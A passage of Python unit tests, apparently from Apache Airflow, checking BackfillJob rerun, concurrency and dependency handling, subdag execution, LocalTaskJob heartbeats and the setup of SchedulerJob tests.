task_id='test_backfill_run_rescheduled_task-1',
dag=dag,
)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_run_rescheduled_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.UP_FOR_RESCHEDULE)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=True
)
job.run()
ti = TI(task=dag.get_task('test_backfill_run_rescheduled_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEqual(ti.state, State.SUCCESS)
def test_backfill_rerun_failed_tasks(self):
dag = DAG(
dag_id='test_backfill_rerun_failed',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
DummyOperator(
task_id='test_backfill_rerun_failed_task-1',
dag=dag)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.FAILED)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=True
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEqual(ti.state, State.SUCCESS)
def test_backfill_rerun_upstream_failed_tasks(self):
dag = DAG(
dag_id='test_backfill_rerun_upstream_failed',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
t1 = DummyOperator(task_id='test_backfill_rerun_upstream_failed_task-1',
dag=dag)
t2 = DummyOperator(task_id='test_backfill_rerun_upstream_failed_task-2',
dag=dag)
t1.set_upstream(t2)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_upstream_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.UPSTREAM_FAILED)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=True
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_upstream_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEqual(ti.state, State.SUCCESS)
def test_backfill_rerun_failed_tasks_without_flag(self):
dag = DAG(
dag_id='test_backfill_rerun_failed',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
DummyOperator(
task_id='test_backfill_rerun_failed_task-1',
dag=dag)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.FAILED)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=False
)
with self.assertRaises(AirflowException):
job.run()
def test_backfill_ordered_concurrent_execute(self):
dag = DAG(
dag_id='test_backfill_ordered_concurrent_execute',
start_date=DEFAULT_DATE,
schedule_interval="@daily")
with dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op5 = DummyOperator(task_id='upstream_level_3')
# order randomly
op2.set_downstream(op3)
op1.set_downstream(op3)
op4.set_downstream(op5)
op3.set_downstream(op4)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
# test executor history keeps a list
history = executor.history
# check if right order. Every loop has a 'pause' (0) to change state
# from RUNNING to SUCCESS.
# 6,0,3,0,3,0,3,0 = 8 loops
self.assertEqual(8, len(history))
loop_count = 0
while len(history) > 0:
queued_tasks = history.pop(0)
if loop_count == 0:
# first loop should contain 6 tasks (3 days x 2 tasks)
self.assertEqual(6, len(queued_tasks))
if loop_count == 2 or loop_count == 4 or loop_count == 6:
# 3 days x 1 task
self.assertEqual(3, len(queued_tasks))
loop_count += 1
def test_backfill_pooled_tasks(self):
"""
Test that queued tasks are executed by BackfillJob
"""
session = settings.Session()
pool = Pool(pool='test_backfill_pooled_task_pool', slots=1)
session.add(pool)
session.commit()
dag = self.dagbag.get_dag('test_backfill_pooled_task_dag')
dag.clear()
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE)
# run with timeout because this creates an infinite loop if not
# caught
with timeout(seconds=30):
job.run()
ti = TI(
task=dag.get_task('test_backfill_pooled_task'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEqual(ti.state, State.SUCCESS)
def test_backfill_depends_on_past(self):
"""
Test that backfill respects ignore_depends_on_past
"""
dag = self.dagbag.get_dag('test_depends_on_past')
dag.clear()
run_date = DEFAULT_DATE + datetime.timedelta(days=5)
# backfill should deadlock
self.assertRaisesRegexp(
AirflowException,
'BackfillJob is deadlocked',
BackfillJob(dag=dag, start_date=run_date, end_date=run_date).run)
BackfillJob(
dag=dag,
start_date=run_date,
end_date=run_date,
ignore_first_depends_on_past=True).run()
# ti should have succeeded
ti = TI(dag.tasks[0], run_date)
ti.refresh_from_db()
self.assertEqual(ti.state, State.SUCCESS)
def test_run_ignores_all_dependencies(self):
"""
Test that run respects ignore_all_dependencies
"""
dag_id = 'test_run_ignores_all_dependencies'
dag = self.dagbag.get_dag('test_run_ignores_all_dependencies')
dag.clear()
task0_id = 'test_run_dependent_task'
args0 = ['run',
'-A',
dag_id,
task0_id,
DEFAULT_DATE.isoformat()]
cli.run(self.parser.parse_args(args0))
ti_dependent0 = TI(
task=dag.get_task(task0_id),
execution_date=DEFAULT_DATE)
ti_dependent0.refresh_from_db()
self.assertEqual(ti_dependent0.state, State.FAILED)
task1_id = 'test_run_dependency_task'
args1 = ['run',
'-A',
dag_id,
task1_id,
(DEFAULT_DATE + datetime.timedelta(days=1)).isoformat()]
cli.run(self.parser.parse_args(args1))
ti_dependency = TI(
task=dag.get_task(task1_id),
execution_date=DEFAULT_DATE + datetime.timedelta(days=1))
ti_dependency.refresh_from_db()
self.assertEqual(ti_dependency.state, State.FAILED)
task2_id = 'test_run_dependent_task'
args2 = ['run',
'-A',
dag_id,
task2_id,
(DEFAULT_DATE + datetime.timedelta(days=1)).isoformat()]
cli.run(self.parser.parse_args(args2))
ti_dependent = TI(
task=dag.get_task(task2_id),
execution_date=DEFAULT_DATE + datetime.timedelta(days=1))
ti_dependent.refresh_from_db()
self.assertEqual(ti_dependent.state, State.SUCCESS)
def test_run_naive_taskinstance(self):
"""
Test that we can run naive (non-localized) task instances
"""
NAIVE_DATE = datetime.datetime(2016, 1, 1)
dag_id = 'test_run_ignores_all_dependencies'
dag = self.dagbag.get_dag('test_run_ignores_all_dependencies')
dag.clear()
task0_id = 'test_run_dependent_task'
args0 = ['run',
'-A',
dag_id,
task0_id,
NAIVE_DATE.isoformat()]
cli.run(self.parser.parse_args(args0))
ti_dependent0 = TI(
task=dag.get_task(task0_id),
execution_date=NAIVE_DATE)
ti_dependent0.refresh_from_db()
self.assertEqual(ti_dependent0.state, State.FAILED)
def test_cli_backfill_depends_on_past(self):
"""
Test that CLI respects -I argument
"""
dag_id = 'test_dagrun_states_deadlock'
run_date = DEFAULT_DATE + datetime.timedelta(days=1)
args = [
'backfill',
dag_id,
'-l',
'-s',
run_date.isoformat(),
]
dag = self.dagbag.get_dag(dag_id)
dag.clear()
self.assertRaisesRegexp(
AirflowException,
'BackfillJob is deadlocked',
cli.backfill,
self.parser.parse_args(args))
cli.backfill(self.parser.parse_args(args + ['-I']))
ti = TI(dag.get_task('test_depends_on_past'), run_date)
ti.refresh_from_db()
# task ran
self.assertEqual(ti.state, State.SUCCESS)
dag.clear()
def test_cli_backfill_depends_on_past_backwards(self):
"""
Test that CLI respects -B argument and raises on interaction with depends_on_past
"""
dag_id = 'test_depends_on_past'
start_date = DEFAULT_DATE + datetime.timedelta(days=1)
end_date = start_date + datetime.timedelta(days=1)
args = [
'backfill',
dag_id,
'-l',
'-s',
start_date.isoformat(),
'-e',
end_date.isoformat(),
'-I'
]
dag = self.dagbag.get_dag(dag_id)
dag.clear()
cli.backfill(self.parser.parse_args(args + ['-I']))
ti = TI(dag.get_task('test_dop_task'), end_date)
ti.refresh_from_db()
# runs fine forwards
self.assertEqual(ti.state, State.SUCCESS)
# raises backwards
expected_msg = 'You cannot backfill backwards because one or more tasks depend_on_past: {}'.format(
'test_dop_task')
self.assertRaisesRegexp(
AirflowException,
expected_msg,
cli.backfill,
self.parser.parse_args(args + ['-B']))
def test_cli_receives_delay_arg(self):
"""
Tests that the --delay argument is passed correctly to the BackfillJob
"""
dag_id = 'example_bash_operator'
run_date = DEFAULT_DATE
args = [
'backfill',
dag_id,
'-s',
run_date.isoformat(),
'--delay_on_limit',
'0.5',
]
parsed_args = self.parser.parse_args(args)
self.assertEqual(0.5, parsed_args.delay_on_limit)
def _get_dag_test_max_active_limits(self, dag_id, max_active_runs=1):
dag = DAG(
dag_id=dag_id,
start_date=DEFAULT_DATE,
schedule_interval="@hourly",
max_active_runs=max_active_runs
)
with dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op1 >> op2 >> op3
op4 >> op3
dag.clear()
return dag
def test_backfill_max_limit_check_within_limit(self):
dag = self._get_dag_test_max_active_limits(
'test_backfill_max_limit_check_within_limit',
max_active_runs=16)
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
dagruns = DagRun.find(dag_id=dag.dag_id)
self.assertEqual(2, len(dagruns))
self.assertTrue(all([run.state == State.SUCCESS for run in dagruns]))
def test_backfill_max_limit_check(self):
dag_id = 'test_backfill_max_limit_check'
run_id = 'test_dagrun'
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
dag_run_created_cond = threading.Condition()
def run_backfill(cond):
cond.acquire()
try:
dag = self._get_dag_test_max_active_limits(dag_id)
# this session object is different than the one in the main thread
thread_session = settings.Session()
# Existing dagrun that is not within the backfill range
dag.create_dagrun(
run_id=run_id,
state=State.RUNNING,
execution_date=DEFAULT_DATE + datetime.timedelta(hours=1),
start_date=DEFAULT_DATE,
)
thread_session.commit()
cond.notify()
finally:
cond.release()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
thread_session.close()
backfill_job_thread = threading.Thread(target=run_backfill,
name="run_backfill",
args=(dag_run_created_cond,))
dag_run_created_cond.acquire()
session = settings.Session()
backfill_job_thread.start()
try:
# at this point backfill can't run since the max_active_runs has been
# reached, so it is waiting
dag_run_created_cond.wait(timeout=1.5)
dagruns = DagRun.find(dag_id=dag_id)
dr = dagruns[0]
self.assertEqual(1, len(dagruns))
self.assertEqual(dr.run_id, run_id)
# allow the backfill to execute by setting the existing dag run to SUCCESS,
# backfill will execute dag runs 1 by 1
dr.set_state(State.SUCCESS)
session.merge(dr)
session.commit()
session.close()
backfill_job_thread.join()
dagruns = DagRun.find(dag_id=dag_id)
self.assertEqual(3, len(dagruns)) # 2 from backfill + 1 existing
self.assertEqual(dagruns[-1].run_id, dr.run_id)
finally:
dag_run_created_cond.release()
def test_backfill_max_limit_check_no_count_existing(self):
dag = self._get_dag_test_max_active_limits(
'test_backfill_max_limit_check_no_count_existing')
start_date = DEFAULT_DATE
end_date = DEFAULT_DATE
# Existing dagrun that is within the backfill range
dag.create_dagrun(run_id="test_existing_backfill",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
# BackfillJob will run since the existing DagRun does not count for the max
# active limit since it's within the backfill date range.
dagruns = DagRun.find(dag_id=dag.dag_id)
# will only be able to run 1 (the existing one) since there's just
# one dag run slot left given the max_active_runs limit
self.assertEqual(1, len(dagruns))
self.assertEqual(State.SUCCESS, dagruns[0].state)
def test_backfill_max_limit_check_complete_loop(self):
dag = self._get_dag_test_max_active_limits(
'test_backfill_max_limit_check_complete_loop')
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
# Given the max limit to be 1 in active dag runs, we need to run the
# backfill job 3 times
success_expected = 2
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
success_dagruns = len(DagRun.find(dag_id=dag.dag_id, state=State.SUCCESS))
running_dagruns = len(DagRun.find(dag_id=dag.dag_id, state=State.RUNNING))
self.assertEqual(success_expected, success_dagruns)
self.assertEqual(0, running_dagruns) # no dag_runs in running state are left
def test_sub_set_subdag(self):
dag = DAG(
'test_sub_set_subdag',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op5 = DummyOperator(task_id='upstream_level_3')
# order randomly
op2.set_downstream(op3)
op1.set_downstream(op3)
op4.set_downstream(op5)
op3.set_downstream(op4)
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
executor = TestExecutor(do_update=True)
sub_dag = dag.sub_dag(task_regex="leave*",
include_downstream=False,
include_upstream=False)
job = BackfillJob(dag=sub_dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor)
job.run()
self.assertRaises(sqlalchemy.orm.exc.NoResultFound, dr.refresh_from_db)
# the run_id should have changed, so a refresh won't work
drs = DagRun.find(dag_id=dag.dag_id, execution_date=DEFAULT_DATE)
dr = drs[0]
self.assertEqual(BackfillJob.ID_FORMAT_PREFIX.format(DEFAULT_DATE.isoformat()),
dr.run_id)
for ti in dr.get_task_instances():
if ti.task_id == 'leave1' or ti.task_id == 'leave2':
self.assertEqual(State.SUCCESS, ti.state)
else:
self.assertEqual(State.NONE, ti.state)
def test_backfill_fill_blanks(self):
dag = DAG(
'test_backfill_fill_blanks',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'},
)
with dag:
op1 = DummyOperator(task_id='op1')
op2 = DummyOperator(task_id='op2')
op3 = DummyOperator(task_id='op3')
op4 = DummyOperator(task_id='op4')
op5 = DummyOperator(task_id='op5')
op6 = DummyOperator(task_id='op6')
dag.clear()
dr = dag.create_dagrun(run_id='test',
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
executor = TestExecutor(do_update=True)
session = settings.Session()
tis = dr.get_task_instances()
for ti in tis:
if ti.task_id == op1.task_id:
ti.state = State.UP_FOR_RETRY
ti.end_date = DEFAULT_DATE
elif ti.task_id == op2.task_id:
ti.state = State.FAILED
elif ti.task_id == op3.task_id:
ti.state = State.SKIPPED
elif ti.task_id == op4.task_id:
ti.state = State.SCHEDULED
elif ti.task_id == op5.task_id:
ti.state = State.UPSTREAM_FAILED
# op6 = None
session.merge(ti)
session.commit()
session.close()
job = BackfillJob(dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor)
self.assertRaisesRegexp(
AirflowException,
'Some task instances failed',
job.run)
self.assertRaises(sqlalchemy.orm.exc.NoResultFound, dr.refresh_from_db)
# the run_id should have changed, so a refresh won't work
drs = DagRun.find(dag_id=dag.dag_id, execution_date=DEFAULT_DATE)
dr = drs[0]
self.assertEqual(dr.state, State.FAILED)
tis = dr.get_task_instances()
for ti in tis:
if ti.task_id in (op1.task_id, op4.task_id, op6.task_id):
self.assertEqual(ti.state, State.SUCCESS)
elif ti.task_id == op2.task_id:
self.assertEqual(ti.state, State.FAILED)
elif ti.task_id == op3.task_id:
self.assertEqual(ti.state, State.SKIPPED)
elif ti.task_id == op5.task_id:
self.assertEqual(ti.state, State.UPSTREAM_FAILED)
def test_backfill_execute_subdag(self):
dag = self.dagbag.get_dag('example_subdag_operator')
subdag_op_task = dag.get_task('section-1')
subdag = subdag_op_task.subdag
subdag.schedule_interval = '@daily'
start_date = timezone.utcnow()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=subdag,
start_date=start_date,
end_date=start_date,
executor=executor,
donot_pickle=True)
job.run()
history = executor.history
subdag_history = history[0]
# check that all 5 task instances of the subdag 'section-1' were executed
self.assertEqual(5, len(subdag_history))
for sdh in subdag_history:
ti = sdh[3]
self.assertIn('section-1-task-', ti.task_id)
subdag.clear()
dag.clear()
def test_subdag_clear_parentdag_downstream_clear(self):
dag = self.dagbag.get_dag('example_subdag_operator')
subdag_op_task = dag.get_task('section-1')
subdag = subdag_op_task.subdag
subdag.schedule_interval = '@daily'
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=subdag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor,
donot_pickle=True)
with timeout(seconds=30):
job.run()
ti0 = TI(
task=subdag.get_task('section-1-task-1'),
execution_date=DEFAULT_DATE)
ti0.refresh_from_db()
self.assertEqual(ti0.state, State.SUCCESS)
sdag = subdag.sub_dag(
task_regex='section-1-task-1',
include_downstream=True,
include_upstream=False)
sdag.clear(
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
include_parentdag=True)
ti0.refresh_from_db()
self.assertEqual(State.NONE, ti0.state)
ti1 = TI(
task=dag.get_task('some-other-task'),
execution_date=DEFAULT_DATE)
self.assertEqual(State.NONE, ti1.state)
# Checks that all the Downstream tasks for Parent DAG
# have been cleared
for task in subdag_op_task.downstream_list:
ti = TI(
task=dag.get_task(task.task_id),
execution_date=DEFAULT_DATE
)
self.assertEqual(State.NONE, ti.state)
subdag.clear()
dag.clear()
def test_backfill_execute_subdag_with_removed_task(self):
"""
Ensure that subdag operators execute properly in the case where
an associated task of the subdag has been removed from the dag
definition, but has instances in the database from previous runs.
"""
dag = self.dagbag.get_dag('example_subdag_operator')
subdag = dag.get_task('section-1').subdag
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=subdag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor,
donot_pickle=True)
removed_task_ti = TI(
task=DummyOperator(task_id='removed_task'),
execution_date=DEFAULT_DATE,
state=State.REMOVED)
removed_task_ti.dag_id = subdag.dag_id
session = settings.Session()
session.merge(removed_task_ti)
with timeout(seconds=30):
job.run()
for task in subdag.tasks:
instance = session.query(TI).filter(
TI.dag_id == subdag.dag_id,
TI.task_id == task.task_id,
TI.execution_date == DEFAULT_DATE).first()
self.assertIsNotNone(instance)
self.assertEqual(instance.state, State.SUCCESS)
removed_task_ti.refresh_from_db()
self.assertEqual(removed_task_ti.state, State.REMOVED)
subdag.clear()
dag.clear()
def test_update_counters(self):
dag = DAG(
dag_id='test_manage_executor_state',
start_date=DEFAULT_DATE)
task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
job = BackfillJob(dag=dag)
session = settings.Session()
dr = dag.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TI(task1, dr.execution_date)
ti.refresh_from_db()
ti_status = BackfillJob._DagRunTaskStatus()
# test for success
ti.set_state(State.SUCCESS, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 1)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 0)
ti_status.succeeded.clear()
# test for skipped
ti.set_state(State.SKIPPED, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 1)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 0)
ti_status.skipped.clear()
# test for failed
ti.set_state(State.FAILED, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 1)
self.assertTrue(len(ti_status.to_run) == 0)
ti_status.failed.clear()
# test for retry
ti.set_state(State.UP_FOR_RETRY, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 1)
ti_status.to_run.clear()
# test for reschedule
ti.set_state(State.UP_FOR_RESCHEDULE, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 1)
ti_status.to_run.clear()
# test for none
ti.set_state(State.NONE, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 1)
ti_status.to_run.clear()
session.close()
def test_dag_get_run_dates(self):
def get_test_dag_for_backfill(schedule_interval=None):
dag = DAG(
dag_id='test_get_dates',
start_date=DEFAULT_DATE,
schedule_interval=schedule_interval)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow',
)
return dag
test_dag = get_test_dag_for_backfill()
self.assertEqual([DEFAULT_DATE], test_dag.get_run_dates(
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE))
test_dag = get_test_dag_for_backfill(schedule_interval="@hourly")
self.assertEqual([DEFAULT_DATE - datetime.timedelta(hours=3),
DEFAULT_DATE - datetime.timedelta(hours=2),
DEFAULT_DATE - datetime.timedelta(hours=1),
DEFAULT_DATE],
test_dag.get_run_dates(
start_date=DEFAULT_DATE - datetime.timedelta(hours=3),
end_date=DEFAULT_DATE,))
def test_backfill_run_backwards(self):
dag = self.dagbag.get_dag("test_start_date_scheduling")
dag.clear()
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=1),
run_backwards=True
)
job.run()
session = settings.Session()
tis = session.query(TI).filter(
TI.dag_id == 'test_start_date_scheduling' and TI.task_id == 'dummy'
).order_by(TI.execution_date).all()
queued_times = [ti.queued_dttm for ti in tis]
self.assertTrue(queued_times == sorted(queued_times, reverse=True))
self.assertTrue(all([ti.state == State.SUCCESS for ti in tis]))
dag.clear()
session.close()
class LocalTaskJobTest(unittest.TestCase):
def setUp(self):
pass
def test_localtaskjob_essential_attr(self):
"""
Check whether essential attributes
of LocalTaskJob can be assigned with
proper values without intervention
"""
dag = DAG(
'test_localtaskjob_essential_attr',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
ti = dr.get_task_instance(task_id=op1.task_id)
job1 = LocalTaskJob(task_instance=ti,
ignore_ti_state=True,
executor=SequentialExecutor())
essential_attr = ["dag_id", "job_type", "start_date", "hostname"]
check_result_1 = [hasattr(job1, attr) for attr in essential_attr]
self.assertTrue(all(check_result_1))
check_result_2 = [getattr(job1, attr) is not None for attr in essential_attr]
self.assertTrue(all(check_result_2))
@patch('os.getpid')
def test_localtaskjob_heartbeat(self, mock_pid):
session = settings.Session()
dag = DAG(
'test_localtaskjob_heartbeat',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = State.RUNNING
ti.hostname = "blablabla"
session.commit()
job1 = LocalTaskJob(task_instance=ti,
ignore_ti_state=True,
executor=SequentialExecutor())
self.assertRaises(AirflowException, job1.heartbeat_callback)
mock_pid.return_value = 1
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.merge(ti)
session.commit()
ret = job1.heartbeat_callback()
self.assertEqual(ret, None)
mock_pid.return_value = 2
self.assertRaises(AirflowException, job1.heartbeat_callback)
@unittest.skipIf('mysql' in configuration.conf.get('core', 'sql_alchemy_conn'),
"flaky when run on mysql")
@unittest.skipIf('postgresql' in configuration.conf.get('core', 'sql_alchemy_conn'),
'flaky when run on postgresql')
def test_mark_success_no_kill(self):
"""
Test that ensures that mark_success in the UI doesn't cause
the task to fail, and that the task exits
"""
dagbag = models.DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_mark_success')
task = dag.get_task('task1')
session = settings.Session()
dag.clear()
dag.create_dagrun(run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TI(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True)
process = multiprocessing.Process(target=job1.run)
process.start()
ti.refresh_from_db()
for i in range(0, 50):
if ti.state == State.RUNNING:
break
time.sleep(0.1)
ti.refresh_from_db()
self.assertEqual(State.RUNNING, ti.state)
ti.state = State.SUCCESS
session.merge(ti)
session.commit()
process.join(timeout=10)
self.assertFalse(process.is_alive())
ti.refresh_from_db()
self.assertEqual(State.SUCCESS, ti.state)
def test_localtaskjob_double_trigger(self):
dagbag = models.DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_localtaskjob_double_trigger')
task = dag.get_task('test_localtaskjob_double_trigger_task')
session = settings.Session()
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=task.task_id, session=session)
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.commit()
ti_run = TI(task=task, execution_date=DEFAULT_DATE)
job1 = LocalTaskJob(task_instance=ti_run,
ignore_ti_state=True,
executor=SequentialExecutor())
with patch.object(BaseTaskRunner, 'start', return_value=None) as mock_method:
job1.run()
mock_method.assert_not_called()
ti = dr.get_task_instance(task_id=task.task_id, session=session)
self.assertEqual(ti.pid, 1)
self.assertEqual(ti.state, State.RUNNING)
session.close()
class SchedulerJobTest(unittest.TestCase):
def setUp(self):
with create_session() as session:
session.query(models.DagRun).delete()
session.query(models.TaskInstance).delete()
session.query(models.Pool).delete()
session.query(models.DagModel).delete()
session.query(SlaMiss).delete()
session.query(errors.ImportError).delete()
session.commit()
@classmethod
def setUpClass(cls):
cls.dagbag = DagBag()
def getboolean(section, key):
if section.lower() == 'core' and key.lower() == 'load_examples':
return False
else:
return configuration.conf.getboolean(section, key)
cls.patcher = mock.patch('airflow.jobs.conf.getboolean')
mock_getboolean = cls.patcher.start()
mock_getboolean.side_effect = getboolean
@classmethod
def tearDownClass(cls):
cls.patcher.stop()
@staticmethod
def run_single_scheduler_loop_with_no_dags(dags_folder):
"""
Utility function that runs a single scheduler loop without actually
changing/scheduling any dags. This is useful to simulate the other side effects of
running a scheduler loop, e.g. to see what parse errors there are in the
dags_folder.
:param dags_folder: the directory to traverse
:type directory: str
"""
scheduler = SchedulerJob(
dag_id='this_dag_doesnt_exist', # We don't want to actually run anything
num_runs=1,
subdir=os.path.join(dags_folder))
scheduler.heartrate = 0
scheduler.run()
def _make_simple_dag_bag(self, dags):
return SimpleDagBag([SimpleDag(dag) for dag in dags])
def test_no_orphan_process_will_be_left(self):
empty_dir = mkdtemp()
current_process = psutil.Process()
old_children = current_process.children(recursive=True)
scheduler = SchedulerJob(subdir=empty_dir,
num_runs=1)
scheduler.executor = TestExecutor()
scheduler.run()
shutil.rmtree(empty_dir)
# Remove potential noise created by previous tests.
current_children = set(current_process.children(recursive=True)) - set(
old_children)
self.assertFalse(current_children)
def test_process_executor_events(self):
dag_id = "test_process_executor_events"
dag_id2 = "test_process_executor_events_2"
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
